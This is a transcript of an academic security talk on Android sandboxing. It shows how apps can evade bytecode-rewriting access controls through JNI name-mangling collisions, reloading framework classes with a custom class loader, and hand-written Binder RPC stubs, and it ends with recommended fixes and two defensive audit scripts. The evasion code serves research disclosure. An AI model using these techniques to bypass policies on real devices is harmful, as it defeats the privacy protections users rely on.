Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University.

Presentation transcript:


Agenda
- Introduction to API-level access control using bytecode rewriting
- Analysis of existing works
- Attacks
- Recommendations

Android Permission System
- The current Android permission system is install-time
- Permissions are coarse-grained, e.g., the INTERNET permission
- Figure: Application -> Android API -> Privileged Resources, with permissions checked at the Android API

API-level Access Control
- Goal: impose fine-grained access control
- Approaches: instrument applications (bytecode rewriting, native library rewriting) or modify the Android platform
- Desired properties: flexibility, rich context information, easy deployment

Existing Works: Bytecode Rewriting
- Improving privacy on Android smartphones through in-vivo bytecode instrumentation. A. Bartel, J. Klein, K. Allix, Y. Le Traon, and M. Monperrus.
- I-ARM-Droid: A rewriting framework for in-app reference monitors for Android applications. B. Davis, B. Sanders, A. Khodaverdian, and H. Chen.
- Dr. Android and Mr. Hide: Fine-grained security policies on unmodified Android. J. Jeon, K. K. Micinski, and J. A. Vaughan.
- Application-centric security policies on unmodified Android. N. Reddy, J. Jeon, J. Vaughan, T. Millstein, and J. Foster.

Objective
A systematic evaluation to assess the effectiveness of API-level access control using bytecode rewriting on the Android platform.

API-level Access Control Using Bytecode Rewriting
Design: Application -> Secure Wrapper -> Android API -> Privileged Resources.
Implementation: OriginalApp.apk -> Dalvik bytecode -> static analysis -> Dalvik bytecode rewriting -> repackage and resigning -> SecureApp.apk.

Android API Architecture
Figure: in the application process (Dalvik Virtual Machine), Application -> Secure Wrapper -> Android APIs -> Native Shared Library via the Java Native Interface; Binder carries calls to the System Services in the System Server Process; the Linux Kernel (Kernel Space) mediates access to Privileged Resources.

Effectiveness of API-level Access Control
Figure: the same architecture as the previous slide (Application, Secure Wrapper, Android APIs, Native Shared Library, Java Native Interface, Binder, System Services, Linux Kernel, Privileged Resources).

Path 2: Invoke Native Libraries Directly
Background: the Java Native Interface (JNI) enables communication between Java code and native code.

Usage, Java side:

    package edu.com;
    public class MyClass {
        native public long myFunc();
        static { System.loadLibrary("myLib"); }
    }

Native side (myLib.so). Either export a function whose name follows the JNI naming convention:

    JNIEXPORT jlong JNICALL Java_edu_com_MyClass_myFunc(JNIEnv* env, jobject thiz);

or register the implementation explicitly in JNI_OnLoad (myFunc takes no arguments and returns a long, so its JNI signature is "()J"):

    static JNINativeMethod method_table[] = {
        { "myFunc", "()J", (void *) myFunc_Implementation }
    };
    extern "C" jint JNI_OnLoad(JavaVM* vm, void* reserved) {
        JNIEnv* env;
        if (vm->GetEnv((void**) &env, JNI_VERSION_1_6) != JNI_OK) return -1;
        jclass c = env->FindClass("edu/com/MyClass");
        env->RegisterNatives(c, method_table, 1);
        return JNI_VERSION_1_6;
    }

Path 2: Exploit JNI Naming Convention
Objective: invoke a native library function without going through its corresponding Java API, to evade the restriction enforced by the secure wrapper.
Figure: Application methods reach the Shared Libraries through JNI, bypassing Secure Wrapper -> Android APIs.

Path 2: Exploit JNI Naming Convention
The native function behind the protected API is named by mangling the Java method name; an underscore in the Java name becomes "_1":

    package edu.com;
    public class MyClass {
        native public long my_Func();
    }

    JNIEXPORT jlong Java_edu_com_MyClass_my_1Func(JNIEnv* env, jobject thiz);

Attempt 1 (fail): a class my in package edu.com.MyClass with a method Func mangles to a different symbol, which myLib.so does not export.

    package edu.com.MyClass;
    public class my {
        native public long Func();
    }

    JNIEXPORT jlong Java_edu_com_MyClass_my_Func(JNIEnv* env, jobject thiz);

Attempt 2 (success): naming the method 1Func, which is illegal in the Java language, mangles to exactly the protected function's symbol Java_edu_com_MyClass_my_1Func.

    package edu.com.MyClass;
    public class my {
        native long 1Func();
        static { System.loadLibrary("myLib"); }
    }

Path 2: Case Study
In the sqlite_jni library we found functions with the "_1" pattern in their names. By invoking SQLite.Database.error.1string we successfully invoked Java_SQLite_Database_error_1string.

    package SQLite.Database;
    public class error {
        public static native String 1string(...);
        static { System.loadLibrary("sqlite_jni"); }
    }

sqlite_jni.so:

    JNIEXPORT jstring JNICALL Java_SQLite_Database_error_1string(JNIEnv *env, ...) { ... }

Path 2: Exploit Java Class Reloading
Objective: modify the implementation of the APIs that the wrapper is trying to protect.
Figure: Application -> Class Loader -> Customized Android APIs -> Shared Libraries via JNI, bypassing Secure Wrapper -> Android APIs.

Path 2: Exploit Java Class Reloading
Attempt 1 (fail): use DexClassLoader to load a redefined class.

Redefined class, packaged in Camera.apk:

    package android.hardware;
    public class Camera {
        final public void someFunc() {
            // Calling the privileged function
            privilegedFunc();
        }
        native void privilegedFunc();
    }

Loading it:

    DexClassLoader classLoader = new DexClassLoader("Camera.apk", ..., getClassLoader());
    Class mClass = classLoader.loadClass("android.hardware.Camera");
    android.hardware.Camera c = (android.hardware.Camera) mClass.newInstance();
    // Access the privileged native code through someFunc()
    c.someFunc();

Result: the class cannot be loaded again. DexClassLoader delegates to its parent loader first, and the parent already holds the framework's android.hardware.Camera.

Path 2: Exploit Java Class Reloading
Attempt 2 (success): use a user-defined class loader that overrides the loading policy.

    package android.hardware;
    public class Camera {
        final public void someFunc() {
            // Calling the privileged function
            privilegedFunc();
        }
        native void privilegedFunc();
    }

    public class MyDexLoader extends BaseDexClassLoader {
        // Constructor: pass the dex path and parent loader through to BaseDexClassLoader
        public MyDexLoader(String dexPath, java.io.File optimizedDir, String libPath, ClassLoader parent) {
            super(dexPath, optimizedDir, libPath, parent);
        }
        // Override loading policy: look up the class in our own dex instead of delegating to the parent
        public Class loadClass(String s) {
            try {
                return super.findClass(s);
            } catch (ClassNotFoundException e) {
                // handling the exceptions
                return null;
            }
        }
    }

Path 2: Case Study
We performed our attack on a camera application. The bytecode rewriter enforced finer-grained access control on the method Camera.takePicture (take pictures between 8am and 6pm only); the attack reloads a redefined android.hardware.Camera class into a new class loader.

    public class SecureCamera {
        public static void takePicture(Camera camera, ...) {
            Time now = new Time();
            now.setToNow();
            // Take pictures between 8am and 6pm
            if (now.hour > 8 && now.hour < 18) {
                camera.takePicture(...);
            }
        }
    }

Redefined class:

    package android.hardware;
    public class Camera {
        public void takeMyPicture(...) { ... }
    }

Path 2: Case Study
The native Java methods of the redefined Camera class must be associated with the corresponding native library functions; registerNatives in com.android.internal.util.WithFramework registers the native functions with the Camera Java class. Attackers can then use their customized class definition.

    // Create a customized class loader
    MyDexLoader ld = new MyDexLoader(...);
    // Load redefined Camera class
    Class c = ld.loadClass("android.hardware.Camera");
    // registerNatives binds the native functions to the Camera Java class
    Class util = ld.loadClass("com.android.internal.util.WithFramework");
    Method m = util.getDeclaredMethod("registerNatives", ...);
    m.invoke(...);
    // Invoke takeMyPicture method using reflection
    m = c.getDeclaredMethod("takeMyPicture", ...);
    m.invoke(...);

Path 2: Recommendations
Against the JNI naming convention exploit: if any Java method name starts with a digit, the bytecode rewriter should remove the digit, as such a name is illegal.
Against Java class reloading: one possible way is for the bytecode rewriter to restrict all invocations of methods within the call chain from findClass in the class BaseDexClassLoader to loadClass in DexFile.
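As an added example (not code from the talk or its rewriter), a check a rewriter could run over an app's native method declarations: it derives each method's JNI short symbol from the JNI specification's mangling rules and reports both conditions behind the two attempts above and the digit rule in the recommendation, a method name that starts with a digit and two different Java methods that mangle to the same symbol. The input list is constructed.

```python
"""JNI symbol-mangling audit (added example, not the talk's or its rewriter's code).
Derives the JNI short symbol of a Java native method and flags the two facts the
naming-convention attack relies on: a method name starting with a digit, and two
different Java methods mangling to one symbol (my_Func vs. my.1Func)."""
from collections import defaultdict

def mangle(component):
    """Escape one name component per the JNI spec: '_' -> '_1', ';' -> '_2',
    '[' -> '_3', any other non-alphanumeric -> '_0xxxx' (lowercase hex)."""
    out = []
    for ch in component:
        if ch == "_":
            out.append("_1")
        elif ch == ";":
            out.append("_2")
        elif ch == "[":
            out.append("_3")
        elif ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            out.append("_0%04x" % ord(ch))
    return "".join(out)

def jni_short_name(package, cls, method):
    """Java_<mangled fully-qualified class name>_<mangled method name>."""
    parts = package.split(".") if package else []
    parts.append(cls)
    return "Java_" + "_".join(mangle(p) for p in parts) + "_" + mangle(method)

def audit(natives):
    """natives: (package, class, method) for every native method the rewriter
    sees in the app. Returns (illegal_names, colliding_symbols)."""
    by_symbol, illegal = defaultdict(list), []
    for pkg, cls, method in natives:
        # A Java identifier cannot start with a digit, but the dex format does
        # not reject it (the talk's case study ran), so the rewriter must.
        if not method or method[0].isdigit():
            illegal.append((pkg, cls, method))
        by_symbol[jni_short_name(pkg, cls, method)].append((pkg, cls, method))
    collisions = {s: o for s, o in by_symbol.items() if len(o) > 1}
    return illegal, collisions

# Constructed input: the talk's legitimate method and its two attack attempts.
NATIVES = [
    ("edu.com", "MyClass", "my_Func"),   # legitimate owner of ..._my_1Func
    ("edu.com.MyClass", "my", "Func"),   # attempt 1: mangles to ..._my_Func
    ("edu.com.MyClass", "my", "1Func"),  # attempt 2: collides with my_Func
]
if __name__ == "__main__":
    print(audit(NATIVES))
```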

Path 3: Exploit Customized RPC Stubs
Objective: application code can communicate with the system services directly, without going through the APIs that invoke the RPC stubs.
Attack: write the attacker's own RPC stub to communicate with the system service.
Figure: Application -> Customized RPC Stubs, bypassing Secure Wrapper -> Android APIs -> Native Shared Library.

Path 3: Case Study
Evaluated on a geolocation application. The bytecode rewriter enforced a fine-grained access control policy on the method getLastKnownLocation: location information is returned only when the location is within Alaska.

    class SecureLocationManager extends LocationManager {
        public Location getLastKnownLocation(...) {
            Location loc = super.getLastKnownLocation(...);
            if (loc.getLatitude() > 60 && loc.getLatitude() < 70 &&
                loc.getLongitude() > 140 && loc.getLongitude() < 160) {
                return loc;
            }
            return null;   // outside the allowed region
        }
    }

Path 3: Case Study
Attackers can introduce a customized RPC stub with a different method signature, bypassing the access control placed on the getLastKnownLocation API.

    package my.location;
    /* User-defined RPC stub class */
    public interface LocMgr extends android.os.IInterface {
        public static abstract class Stub extends android.os.Binder implements my.location.LocMgr { ... }
    }

    import my.location.LocMgr;
    IBinder b = android.os.ServiceManager.getService(LOCATION_SERVICE);
    LocMgr sLocationManager = LocMgr.Stub.asInterface(b);
    Location loc = sLocationManager.getLastKnownLocation(...);

Path 3: Recommendation
The fix is to apply the API-level access control to android.os.ServiceManager's getService API, so that the application's Java code cannot use it to obtain system services.
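As an added example (not the talk's rewriter), a small smali-level pass that implements this recommendation: every direct invocation of android.os.ServiceManager.getService in the app's bytecode is redirected to a wrapper class that the rewriter would ship inside the repackaged APK, and raw IBinder.transact calls and BaseDexClassLoader subclasses are reported for review. The wrapper class name and the sample smali are assumptions constructed here.

```python
"""Smali-level redirection of ServiceManager.getService (added example, not the
talk's rewriter). Models the fix recommended for Path 3: every direct call to
android.os.ServiceManager.getService in app bytecode is redirected to a secure
wrapper, so the app cannot get a raw IBinder for a system service and drive it
through a hand-written RPC stub. Wrapper class name is hypothetical."""
import re

WRAPPER = "Lsecure/wrapper/SecureServiceManager;"   # hypothetical, shipped in the APK
SERVICE_MANAGER = "Landroid/os/ServiceManager;"
# e.g. invoke-static {v0}, Landroid/os/ServiceManager;->getService(Ljava/lang/String;)Landroid/os/IBinder;
INVOKE_RE = re.compile(r"^\s*invoke-(\w+)(/range)?\s+\{[^}]*\},\s+(L[^;]+;)->([^(]+)\(")
SUPER_RE = re.compile(r"^\s*\.super\s+(L[^;]+;)")

def rewrite_smali(lines):
    """Return (rewritten_lines, findings) for the smali of one class.
    findings is a list of (line_no, note)."""
    out, findings = [], []
    for n, line in enumerate(lines, 1):
        m = SUPER_RE.match(line)
        if m and m.group(1) == "Ldalvik/system/BaseDexClassLoader;":
            # Path 2: a user-defined loader can reload framework classes.
            findings.append((n, "extends BaseDexClassLoader"))
        m = INVOKE_RE.match(line)
        if m and m.group(3) == SERVICE_MANAGER and m.group(4) == "getService":
            # Path 3 fix: the wrapper's static getService applies the policy
            # and can refuse to hand out binders for guarded services.
            line = line.replace(SERVICE_MANAGER + "->getService(", WRAPPER + "->getService(")
            findings.append((n, "ServiceManager.getService redirected"))
        elif m and m.group(3) == "Landroid/os/IBinder;" and m.group(4) == "transact":
            # Assumption: a custom RPC stub has to call transact itself.
            findings.append((n, "raw IBinder.transact"))
        out.append(line)
    return out, findings

# Constructed smali for a hand-written stub like the talk's my.location.LocMgr.
SAMPLE_SMALI = """\
.class public Lmy/location/LocMgr$Stub;
.super Landroid/os/Binder;
.method public getLastKnownLocation(Ljava/lang/String;)Landroid/location/Location;
    invoke-static {v0}, Landroid/os/ServiceManager;->getService(Ljava/lang/String;)Landroid/os/IBinder;
    invoke-interface {v1, v2, v3, v4, v5}, Landroid/os/IBinder;->transact(ILandroid/os/Parcel;Landroid/os/Parcel;I)Z
.end method
""".splitlines()

if __name__ == "__main__":
    for l in rewrite_smali(SAMPLE_SMALI)[0]:
        print(l)
```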

Conclusion
Our work shows that all of the above attacks must be addressed before API-level access control using bytecode rewriting can be effective.

Questions?